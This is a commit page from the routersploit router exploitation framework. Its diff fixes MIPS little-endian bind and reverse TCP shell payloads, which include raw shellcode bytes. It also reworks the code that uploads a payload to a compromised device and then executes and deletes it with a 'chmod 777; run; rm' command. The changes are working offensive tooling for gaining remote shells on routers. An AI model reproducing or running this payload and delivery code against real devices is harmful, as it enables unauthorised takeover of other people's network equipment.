Skip to content

R
routersploit
Commit df6e1b66 by Marcin Bury Committed by GitHub
Options

Payloads fixes (#337) 

* Fixing payloads

* Pep fixes
parent 86b8c55e
Showing with 15 additions and 8 deletions
routersploit/modules/payloads/mipsle/bind_tcp.py
...@@ -18,10 +18,10 @@ class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload): ...@@ -18,10 +18,10 @@ class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload):
], ],
} }
architecture = Architectures.MIPSBE architecture = Architectures.MIPSLE
def generate(self): def generate(self):
bind_port = validators.convert_port(self.lport) bind_port = validators.convert_port(self.rport)
return ( return (
"\xe0\xff\xbd\x27" + # addiu sp,sp,-32 "\xe0\xff\xbd\x27" + # addiu sp,sp,-32
"\xfd\xff\x0e\x24" + # li t6,-3 "\xfd\xff\x0e\x24" + # li t6,-3
......
routersploit/modules/payloads/mipsle/reverse_tcp.py
...@@ -18,7 +18,7 @@ class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload): ...@@ -18,7 +18,7 @@ class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
], ],
} }
architecture = Architectures.MIPSBE architecture = Architectures.MIPSLE
def generate(self): def generate(self):
reverse_ip = validators.convert_ip(self.lhost) reverse_ip = validators.convert_ip(self.lhost)
......
routersploit/shell.py
...@@ -283,16 +283,19 @@ class Communication(object): ...@@ -283,16 +283,19 @@ class Communication(object):
if isinstance(item_exec_binary, str): if isinstance(item_exec_binary, str):
try: try:
commands.append(item_exec_binary.format(path)) commands.append(item_exec_binary.format(path))
except ValueError: except (KeyError, ValueError):
commands.append(item_exec_binary) commands.append(item_exec_binary)
elif callable(item_exec_binary): elif callable(item_exec_binary):
commands.append(item_exec_binary(path)) commands.append(item_exec_binary(path))
# instruction to execute generic payload e.g. netcat / awk # instruction to execute generic payload e.g. netcat / awk
elif isinstance(self.exec_binary, str): elif isinstance(self.exec_binary, str):
try:
commands.append(self.exec_binary.format(path))
except (KeyError, ValueError):
commands.append(self.exec_binary) commands.append(self.exec_binary)
# default way of exectuign payload # default way of executing payload
else: else:
exec_binary_str = "chmod 777 {0}; {0}; rm {0}".format(path) exec_binary_str = "chmod 777 {0}; {0}; rm {0}".format(path)
commands.append(exec_binary_str) commands.append(exec_binary_str)
...@@ -314,7 +317,7 @@ class Communication(object): ...@@ -314,7 +317,7 @@ class Communication(object):
for command in commands[:-1]: for command in commands[:-1]:
self.exploit.execute(command) self.exploit.execute(command)
# asynchronous last command to execute binary # asynchronous last command to execute binary & rm binary
thread = threading.Thread(target=self.exploit.execute, args=(commands[-1],)) thread = threading.Thread(target=self.exploit.execute, args=(commands[-1],))
thread.start() thread.start()
...@@ -333,8 +336,12 @@ class Communication(object): ...@@ -333,8 +336,12 @@ class Communication(object):
# execute binary # execute binary
commands = self.build_commands() commands = self.build_commands()
for command in commands: # synchronized commands
thread = threading.Thread(target=self.exploit.execute, args=(command,)) for command in commands[:-1]:
self.exploit.execute(command)
# asynchronous last command to execute binary & rm binary
thread = threading.Thread(target=self.exploit.execute, args=(commands[-1],))
thread.start() thread.start()
# connecting to shell # connecting to shell
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment